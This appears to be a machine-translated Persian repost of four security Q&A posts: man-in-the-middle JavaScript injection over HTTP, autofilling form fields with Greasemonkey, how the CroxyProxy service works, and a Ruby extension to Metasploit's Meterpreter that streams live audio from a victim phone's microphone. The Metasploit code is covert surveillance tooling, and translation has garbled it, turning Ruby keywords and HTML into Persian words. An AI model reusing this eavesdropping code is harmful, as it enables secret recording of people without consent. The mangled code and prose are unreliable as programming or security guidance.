نوشته‌شده در

آیا کامپیوتر من می تواند جاوا اسکریپت مخرب را به دلیل حمله انسان در میان ارتباط با سایت HTTP اجرا کند؟

یک مثال برای اهداف تصویری وجود دارد:

فرض کنید که سایت آموزشی درباره اساطیر سلتیک وجود دارد. این سایت صرفا به عنوان خوانده شده است، نه حتی نظرات اجازه داده شده است. این نیز بسیار ساده است، آن را هیچ اجزای اجرایی مانند جاوا اسکریپت / فلش / جاوا / سیلورلایت / وحدت / اکتیو ایکس. هیچ تبلیغی وجود ندارد زیرا این سایت به کمک های مالی زندگی می کند. به طور خلاصه، این فقط مجموعه ای از اسناد HTML کاملا بی ضرر است.

اما این سایت از HTTP به جای HTTPS استفاده می کند. آیا این بدان معنی است که به لحاظ نظری، برخی از عوامل مخرب (مانند هکر، بدافزار از دستگاه دیگر یا ISP) می توانند به "مرد در میان" تبدیل شوند و جاوا اسکریپت مخربی (به عنوان مثال) را به صفحه منتقل می کنند، با وجود اینکه صفحه اصلی دارای جاوا اسکریپت نبود در کل؟

نوشته‌شده در

جاوا اسکریپت – تخصیص ارزش عنصری از طریق کنسول (x.value = "y") برای تکمیل ارسال فرم کافی نیست

این مسئله بین امنیت اطلاعات و برنامه نویسی جاوااسکریپت وجود دارد (من هم به آن متخصص نیستم.)

توسعهدهندگان یک وبسایت خاص گزینه ای برای ذخیره اطلاعات فرم را غیرفعال کردند. حتی نامهای کاربری نمیتوانند ذخیره شوند، بنابراین من سعی کردم با اسکریپت Greasemonkey غلبه کنم، از طریق: 

 document.querySelector ('# username'). value = "myUsername"؛

من می توانم تمام زمینه های غیر رمز عبور را به این ترتیب پر کنم، اما این کافی نخواهد بود:

بعد از اینکه همه فیلدهای غیر رمز عبور را با یک عمل مشابه document.querySelector پر کردم و بعد از من دستی رمز عبور خود را وارد کرده و بر روی "Submit" کلیک کردم اما به من گفته شد که "همه فیلدها لازم هستند"؛ به نظر می رسد ارزش ارزش تعیین نمی شود.

محتوا به رسمیت شناخته شده است، اگر برای مثال، آخرین حرف از مقدار تعیین شده را حذف کنید، یعنی اگر با ماوس به یک فیلد خاص (فیلد نام کاربری در آن مورد) حرکت کنید، آخرین حرف از myUsername را پاک کنید، پس از آن myUsernam و سپس اگر من e`

من سعی کردم یک رویداد (19459006) را برای هر فیلد بفرستم، اما این وضعیت را تغییر نمی دهد.

سوال من این است که چه چیزی باعث خواهد شد چنین رفتاری و چگونه می توانم با وانیل جاوا اسکریپت بر آن غلبه کنم؟

</p> <pre>جاوا اسکریپت - تخصیص ارزش عنصری از طریق کنسول (x.value = "y") برای تکمیل ارسال فرم کافی نیست<br />

نوشته‌شده در

برنامه وب – اسکریپت CroxyProxy؟

اخیرا در این وبسایت به نام CroxyProxy آمده ام. این یک وب سایت پروکسی است که به شما اجازه می دهد تا سایت های پیشرفته و پیچیده مانند تروجان، یوتیوب، netflix و سایت های دیگر را که فایرفاکس، Glype و پروکسی های CGI معمولی بر روی آن کار می کنند، کنترل کنید. آیا کسی اسکریپت مورد استفاده را می داند؟ یا چگونه کار می کند؟ من تعجب می کردم که آیا اسکریپت امکان پذیر است – به طوری که اگر پرونده کروکسی پروکسی مسدود شود، شما می توانید نسخه خود را از پروکسی میزبانی کنید. من فقط این کار را انجام خواهم داد اگر قانون کپی رایت و غیره را نقض نکنید.

با تشکر

نوشته‌شده در

اندروید – نحوه پخش صوت از تلفن قربانی با اسکریپت metasploit ruby

من می خواهم جریان صوتی میکروفون را در metasploit مانند webcam_stream ایجاد کنم، بنابراین برخی از کدها را به اسکریپت ruby ​​اضافه کردم: (/ usr / share / metasploit-framework / lib / rex / post / meterpreter / ui / console / command_dispatcher / stdapi / webcam.rb )، قطعه کد اضافه شده است: 

 def cmd_mic_stream (* args)

print_status ("شروع ...")
stream_path = Rex :: Text.rand_text_alpha (8) + ".wav"
player_path = Rex :: Text.rand_text_alpha (8) + ".html"
مدت زمان = 2
view = true
وقفه = 1800

record_mic_opts = Rex :: Parser :: Arguments.new (
  "-h" => [ false, "Help Banner" ]
  "-d" => [ true, "The stream duration in seconds (Default:2)" ]، # 1/30 دقیقه
  "-s" => [ true, "The stream file path (Default: '#{stream_path}')" ]
  "-t" => [ true, "The stream player path (Default: #{player_path})"]
  "-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)

 record_mic_opts.parse (args) انجام دهید، _idx، val |
  انتخاب مورد
  وقتی "-h"
    print_line ("استفاده: record_mic [options]  n")
    print_line ("ضبط صدا از پیش فرض میکروفون")
    print_line (record_mic_opts.usage)
    برگشت
  وقتی "-d"
    مدت زمان = val.to_i
  وقتی "-s"
    stream_path = val
  وقتی "-t"
    player_path = val
  وقتی "-v"
    نمایش = true اگر val = ~ / ^ (f | n | 0) / i
  پایان
پایان

print_status ("آماده سازی بازیکن ...")
<! -
    html =٪ | 



 Metasploit webcam_stream - # {client.sock.peerhost} 





 هدف IP: # {client.sock.peerhost}
زمان شروع: # {Time.now}
وضعیت: 




 


 www.metasploit.com 





     |

->


:: فایل.open (player_path، 'wb') do | f |

  f.write (html)

پایان

اگر دید

  print_status ("باز کردن بازیکن در: # {player_path}")

  Rex :: Compat.open_file (player_path)

چیز دیگری

  print_status ("لطفا به صورت دستی با مرورگر باز شود: # {player_path}")

پایان


print_status ("جریان ...")

شروع

  :: Timeout.timeout (timeout) انجام دهید

    در حالی که مشتری انجام می دهد

      data = client.webcam.record_mic (مدت زمان)

      اگر داده

         :: فایل.open (stream_path، 'wb') do | d |

         d.write (داده ها)

        پایان

        داده ها = nil

        خواب (5)

      پایان

    پایان

  پایان

نجات :: زمان بندی :: خطا

پایان


print_status ("متوقف شد")

پایان




 شما ممکن است متوجه شوید که آن را به فرمان webcam_stream شبیه است، مشکل اینجاست که مرورگر باز می شود، وضعیت خروجی «پخش» می شود، اما صوتی چیزی را بازی نمی کند، فقط چیزی که ممکن است باعث آن شود خالی است؟